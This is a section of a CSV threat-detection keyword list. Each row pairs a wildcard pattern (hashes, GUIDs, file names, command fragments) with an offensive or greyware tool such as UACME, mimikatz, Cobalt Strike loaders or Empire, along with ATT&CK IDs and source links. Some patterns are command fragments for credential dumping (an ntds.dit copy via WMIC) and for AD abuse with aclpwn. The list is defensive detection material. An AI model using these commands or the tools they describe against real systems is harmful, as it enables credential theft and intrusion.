-*969b35213fa23ff50a169e5498a97f28bc6f5820b447b78ec9dc6910dd8cc3e8*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z
-*97e0720ed22d2d99e8148aab7ab2cb2cc3df278225669828b2d8d4d9ef856d94*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z
-*9877129f209f0c3faf146ab725442b614c49942b7b888e3aabf5903217cb0503*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z
-*99$1a7F1qr2HihoXfs/56u5XMdpDZ83N6hW/HI=*,offensive_tool_keyword,ShuckNT,ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES),T1552.001 - T1555.003 - T1078.003,TA0006 - TA0002 - TA0040,N/A,N/A,Credential Access,https://github.com/yanncam/ShuckNT,1,1,N/A,10,1,36,4,2023-02-02T10:40:59Z,2023-01-27T07:52:47Z
-*99e3e313b62bb8b55e2637fc14a78adb6f33632a3c722486416252e2630cfdf6*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,0,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z
-*99E40E7F-00A4-4FB1-9441-B05A56C47C08*,offensive_tool_keyword,openbullet,The OpenBullet web testing application.,T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001,TA0005 - TA0001,N/A,N/A,Web Attacks,https://github.com/openbullet/openbullet,1,0,N/A,10,10,1342,714,2023-02-24T16:29:01Z,2019-03-26T09:06:32Z
-*9a4b0023e443b33d85280eedb510864c42b4146c8e6e5f742444b3eff0aae55f*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z
-*9AA32BBF-90F3-4CE6-B210-CBCDB85052B0*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,0,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z
-*9AC25A8825407CCB6089BC7A2DF530D1830795B7E71A981ECEE4C5F48387B37A*,offensive_tool_keyword,ADACLScanner,A tool with GUI used to create reports of access 
control lists (DACLs) and system access control lists (SACLs) in Active Directory .,T1222 - T1069 - T1018,TA0002 - TA0007 - TA0043,N/A,N/A,AD Enumeration,https://github.com/canix1/ADACLScanner,1,0,N/A,7,9,809,151,2023-09-12T21:35:21Z,2017-04-06T12:28:37Z
-*9b9850751be2515c8231e5189015bbe6:49ef7638d69a01f26d96ed673bf50c45*,offensive_tool_keyword,rpivot,socks4 reverse proxy for penetration testing,T1090.004 - T1572 - T1021.001,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/klsecservices/rpivot,1,0,N/A,10,10,490,125,2018-07-12T09:53:13Z,2016-09-07T17:25:57Z
-*9b9dad8b40daf87f796c91a0538198921acebd13d47515e0e27b18eaad6906f4*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z
-*9bd3b7a206ced26ce5e03a4002bbd41e4f57b8c8c9ce4467f54221ad68e55a58*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z
-*9c0087f31cd45fe4bfa0ca79b51df2c69d67c44f2fbb2223d7cf9ab8d971c360*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z
-*9c71ab720c5589739b70ecd7f5bae0bb6ab2ac043bac1a24aec50864f3037719*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z
-*9cbedf9b92abaef3ea28de28dd523ac44079592178ef727c7003c339a5a54712*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z
-*9ccf0c8c7eef918c9dd7b89dd94f0dfa7dc8779b1f9e862908b09b47b75f7d1f*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z
-*9D1B853E-58F1-4BA5-AEFC-5C221CA30E48*,offensive_tool_keyword,SharPersist,SharPersist Windows persistence toolkit written in C#.,T1547 - T1053 - T1027 - T1028 - T1112,TA0003 - TA0008,N/A,N/A,Persistence,https://github.com/fireeye/SharPersist,1,0,N/A,10,10,1150,233,2023-08-11T00:52:09Z,2019-06-21T13:32:14Z
-*9D365106-D7B8-4B5E-82CC-6D6ABCDCA2B8*,offensive_tool_keyword,NTDLLReflection,Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table,T1055.012 - T1574.002 - T1027.001 - T1218.011,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/NTDLLReflection,1,0,N/A,9,3,278,42,2023-08-02T02:21:43Z,2023-02-03T17:12:33Z
-*9E357027-8AA6-4376-8146-F5AF610E14BB*,offensive_tool_keyword,SharpSword,Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly,T1562.004 - T1059.001 - T1021.003,TA0005 - TA0002,N/A,N/A,C2,https://github.com/OG-Sadpanda/SharpSword,1,0,N/A,8,10,110,13,2023-08-22T20:16:28Z,2021-07-15T14:50:05Z
-*9e3f1386bfb64dbaa3cbb12fd3bf51c734872c2fdf15cf1aaeca52a515767519*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - 
T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z
-*9emin1/charlotte*,offensive_tool_keyword,charlotte,c++ fully undetected shellcode launcher,T1055.012 - T1059.003 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/9emin1/charlotte,1,1,N/A,10,10,930,234,2021-06-11T04:44:18Z,2021-05-13T07:32:03Z
-*A La Vie* A L'Amour*,offensive_tool_keyword,mimikatz,mimikatz default strings,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z
-*a0rtega/metame*,offensive_tool_keyword,metame,metame is a metamorphic code engine for arbitrary executables,T1027 - T1059.003 - T1140,TA0005 - TA0009,N/A,N/A,Defense Evasion,https://github.com/a0rtega/metame,1,1,N/A,N/A,6,508,96,2019-10-06T18:24:14Z,2016-08-07T13:56:57Z
-*A17656B2-42D1-42CD-B76D-9B60F637BCB5*,offensive_tool_keyword,PowerShx,Run Powershell without software restrictions.,T1059.001 - T1055.001 - T1055.012,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/iomoath/PowerShx,1,0,N/A,7,3,267,46,2021-09-08T03:44:10Z,2021-09-06T18:32:45Z
-*A38C04C7-B172-4897-8471-E3478903035E*,offensive_tool_keyword,DiskCryptor,DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions,T1486 ,TA0040,N/A,N/A,Ransomware,https://github.com/DavidXanatos/DiskCryptor,1,0,N/A,10,4,361,96,2023-08-13T11:20:25Z,2019-04-20T14:51:18Z
-*A38C04C7-B172-4897-8471-E3478903035E*,offensive_tool_keyword,DiskCryptor,DiskCryptor is an open source encryption solution that offers encryption of all disk partitions 
including system partitions,T1486 ,TA0040,N/A,N/A,Ransomware,https://github.com/DavidXanatos/DiskCryptor,1,0,N/A,10,4,361,96,2023-08-13T11:20:25Z,2019-04-20T14:51:18Z
-*a3bc28e48c61afe31a0c986674ac145e773d616b2fafb49a090d50cc26ea4479*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z
-*A3h1nt/gimmeSH*,offensive_tool_keyword,gimmeSH,gimmeSH. is a tool that generates a custom cheatsheet for Reverse Shell. File Transfer and Msfvenom within your terminal. you just need to provide the platform. your Internet protocol address and your port number.,T1059 T1505,TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/A3h1nt/gimmeSH,1,1,N/A,N/A,2,168,27,2021-08-27T03:12:15Z,2021-08-02T07:22:15Z
-*a6730ebb3e91961283f7a1cd95ace2a6d0d55e50531a64e57b03e61a8cf2d0e7*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z
-*a7469955bff5e489d2270d9b389064e1*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,0,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z
-*a78983b009b688a82458abac952516db57dc7eb3118a35cc737dde29c7b87ec4*,offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and 
server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,0,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z
-*A7AD39B5-9BA1-48A9-B928-CA25FDD8F31F*,offensive_tool_keyword,regreeper,gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.,T1050.005 - T1012 - T1112 - T1553.002 - T1053.005,TA0005 - TA0003 - TA0007,N/A,N/A,Defense Evasion - Persistence,https://github.com/tccontre/Reg-Restore-Persistence-Mole,1,0,N/A,10,1,46,15,2023-08-23T11:34:26Z,2023-08-03T14:47:45Z
-*A8FE1F5C-6B2A-4417-907F-4F6EDE9C15A3*,offensive_tool_keyword,CheeseTools,tools for Lateral Movement/Code Execution,T1021.006 - T1059.003 - T1105,TA0008 - TA0002,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/klezVirus/CheeseTools,1,0,N/A,10,7,653,138,2021-08-17T20:22:56Z,2020-08-24T01:28:12Z
-*aa3939fc357723135870d5036b12a67097b03309*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.exe*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,0,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*AAABAAMAEBAAAAEAIABoBAAANgAAACAgAAABACAAKBEAAJ4EAAAwMAAAAQAgAGgmAADGFQAAKAAAABAAAAAgAAAAAQAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP39*,offensive_tool_keyword,cuddlephish,Weaponized Browser-in-the-Middle (BitM) for Penetration Testers,T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001,TA0009 - TA0006,N/A,N/A,Sniffing & Spoofing,https://github.com/fkasler/cuddlephish,1,0,N/A,10,2,152,10,2023-09-06T12:25:08Z,2023-08-02T14:30:41Z -*AAB4D641-C310-4572-A9C2-6D12593AB28E*,offensive_tool_keyword,SharpEfsPotato,Local privilege escalation from SeImpersonatePrivilege using EfsRpc.,T1548.002 - T1134.002,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/bugch3ck/SharpEfsPotato,1,0,N/A,10,3,241,40,2022-10-17T12:35:06Z,2022-10-17T12:20:47Z -*aakchaleigkohafkfjfjbblobjifikek*,greyware_tool_keyword,ProxFlow,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data 
Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A
-*AAP-AddToHighPrivilegePrincipalMap*,offensive_tool_keyword,Azure-AccessPermissions,Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/csandker/Azure-AccessPermissions,1,0,N/A,6,1,90,16,2023-02-21T06:46:24Z,2022-10-19T10:33:24Z
-*AAP-CheckIfMemberOfPrivilegedDirectoryRole*,offensive_tool_keyword,Azure-AccessPermissions,Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/csandker/Azure-AccessPermissions,1,0,N/A,6,1,90,16,2023-02-21T06:46:24Z,2022-10-19T10:33:24Z
-*AAP-DisplayApplicableMFAConditionalAccessPolicyForUserID*,offensive_tool_keyword,Azure-AccessPermissions,Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/csandker/Azure-AccessPermissions,1,0,N/A,6,1,90,16,2023-02-21T06:46:24Z,2022-10-19T10:33:24Z
-*AAP-DisplayHighPrivilegePrincipalMap*,offensive_tool_keyword,Azure-AccessPermissions,Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/csandker/Azure-AccessPermissions,1,0,N/A,6,1,90,16,2023-02-21T06:46:24Z,2022-10-19T10:33:24Z
-*AAP-DisplayNonHighPrivilegedRoleAssignments*,offensive_tool_keyword,Azure-AccessPermissions,Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD 
Enumeration,https://github.com/csandker/Azure-AccessPermissions,1,0,N/A,6,1,90,16,2023-02-21T06:46:24Z,2022-10-19T10:33:24Z
-*AAP-GetHighPrivilegedDirectoryRoleTemplateMap*,offensive_tool_keyword,Azure-AccessPermissions,Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/csandker/Azure-AccessPermissions,1,0,N/A,6,1,90,16,2023-02-21T06:46:24Z,2022-10-19T10:33:24Z
-*abopscript.txt*,offensive_tool_keyword,EQGR,Equation Group scripts and tools,T1213.001 - T1203.001,TA0001 - TA0003,N/A,N/A,Exploitation tools,https://fdik.org/EQGRP/Linux/doc/old/etc/abopscript.txt,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*aboul3la*,offensive_tool_keyword,Github Username,Github username of pentester known for enumeration tools,N/A,N/A,N/A,N/A,Information Gathering,https://github.com/aboul3la,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*AbuseGithubAPI*.cpp*,offensive_tool_keyword,GithubC2,Github as C2,T1095 - T1071.001,TA0011,N/A,N/A,C2,https://github.com/TheD1rkMtr/GithubC2,1,0,N/A,10,10,115,29,2023-08-02T02:26:05Z,2023-02-15T00:50:59Z
-*AbuseGithubAPI*.exe*,offensive_tool_keyword,GithubC2,Github as C2,T1095 - T1071.001,TA0011,N/A,N/A,C2,https://github.com/TheD1rkMtr/GithubC2,1,0,N/A,10,10,115,29,2023-08-02T02:26:05Z,2023-02-15T00:50:59Z
-*ac i ntds*\\127.0.0.1\ADMIN$\*,greyware_tool_keyword,wmic,The actor has executed WMIC commands [T1047] to create a copy of the ntds.dit file and SYSTEM registry hive using ntdsutil.exe,T1047 - T1005 - T1567.001,TA0002 - TA0003 - TA0007,N/A,Volt Typhoon,Credential Access,https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*ACBypassTest*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-FodHelperBypass.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-*Accenture/Spartacus*,offensive_tool_keyword,Spartacus,Spartacus DLL/COM Hijacking Toolkit,T1574.001 - T1055.001 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/Accenture/Spartacus,1,1,N/A,10,9,826,104,2023-09-02T00:48:42Z,2022-10-28T09:00:35Z
-*AccessTokenImpersonationAccount*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z
-*Accounts with extra permissions.txt*,offensive_tool_keyword,ACLight,A tool for advanced discovery of Privileged Accounts - including Shadow Admins.,T1087 - T1003 - T1208,TA0001 - TA0006 - TA0008,N/A,N/A,AD Enumeration,https://github.com/cyberark/ACLight,1,0,N/A,7,8,730,150,2019-09-09T06:48:45Z,2017-05-17T09:29:41Z
-*AceLdr.*.bin*,offensive_tool_keyword,cobaltstrike,Cobalt Strike UDRL for memory scanner evasion.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/kyleavery/AceLdr,1,1,N/A,10,10,712,123,2023-09-28T19:47:03Z,2022-08-11T00:06:09Z
-*AceLdr.zip*,offensive_tool_keyword,cobaltstrike,Cobalt Strike UDRL for memory scanner evasion.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 
T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/kyleavery/AceLdr,1,1,N/A,10,10,712,123,2023-09-28T19:47:03Z,2022-08-11T00:06:09Z
-*acf7a8a9-3aaf-46c2-8aa8-2d12d7681baf*,offensive_tool_keyword,SharpNoPSExec,Get file less command execution for lateral movement.,T1021.006 - T1059.003 - T1105,TA0008 - TA0002 - TA0011,N/A,N/A,Lateral Movement,https://github.com/juliourena/SharpNoPSExec,1,0,N/A,10,6,567,85,2022-06-03T10:32:55Z,2021-04-24T22:02:38Z
-*acheron-master.zip*,offensive_tool_keyword,acheron,indirect syscalls for AV/EDR evasion in Go assembly,T1055.012 - T1059.001 - T1059.003,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/f1zm0/acheron,1,1,N/A,N/A,3,244,31,2023-06-13T19:20:33Z,2023-04-07T10:40:33Z
-*ACLight.ps1*,offensive_tool_keyword,ACLight,A tool for advanced discovery of Privileged Accounts - including Shadow Admins.,T1087 - T1003 - T1208,TA0001 - TA0006 - TA0008,N/A,N/A,AD Enumeration,https://github.com/cyberark/ACLight,1,1,N/A,7,8,730,150,2019-09-09T06:48:45Z,2017-05-17T09:29:41Z
-*ACLight.psd1*,offensive_tool_keyword,ACLight,A tool for advanced discovery of Privileged Accounts - including Shadow Admins.,T1087 - T1003 - T1208,TA0001 - TA0006 
- TA0008,N/A,N/A,AD Enumeration,https://github.com/cyberark/ACLight,1,1,N/A,7,8,730,150,2019-09-09T06:48:45Z,2017-05-17T09:29:41Z
-*ACLight.psm1*,offensive_tool_keyword,ACLight,A tool for advanced discovery of Privileged Accounts - including Shadow Admins.,T1087 - T1003 - T1208,TA0001 - TA0006 - TA0008,N/A,N/A,AD Enumeration,https://github.com/cyberark/ACLight,1,1,N/A,7,8,730,150,2019-09-09T06:48:45Z,2017-05-17T09:29:41Z
-*ACLight2.ps1*,offensive_tool_keyword,ACLight,A tool for advanced discovery of Privileged Accounts - including Shadow Admins.,T1087 - T1003 - T1208,TA0001 - TA0006 - TA0008,N/A,N/A,AD Enumeration,https://github.com/cyberark/ACLight,1,1,N/A,7,8,730,150,2019-09-09T06:48:45Z,2017-05-17T09:29:41Z
-*ACLight2.psd1*,offensive_tool_keyword,ACLight,A tool for advanced discovery of Privileged Accounts - including Shadow Admins.,T1087 - T1003 - T1208,TA0001 - TA0006 - TA0008,N/A,N/A,AD Enumeration,https://github.com/cyberark/ACLight,1,1,N/A,7,8,730,150,2019-09-09T06:48:45Z,2017-05-17T09:29:41Z
-*ACLight2.psm1*,offensive_tool_keyword,ACLight,A tool for advanced discovery of Privileged Accounts - including Shadow Admins.,T1087 - T1003 - T1208,TA0001 - TA0006 - TA0008,N/A,N/A,AD Enumeration,https://github.com/cyberark/ACLight,1,1,N/A,7,8,730,150,2019-09-09T06:48:45Z,2017-05-17T09:29:41Z
-*ACLight-master*,offensive_tool_keyword,ACLight,A tool for advanced discovery of Privileged Accounts - including Shadow Admins.,T1087 - T1003 - T1208,TA0001 - TA0006 - TA0008,N/A,N/A,AD Enumeration,https://github.com/cyberark/ACLight,1,1,N/A,7,8,730,150,2019-09-09T06:48:45Z,2017-05-17T09:29:41Z
-*aclpwn -f * -ft computer -t * -tt domain -d * -dry*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation 
tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
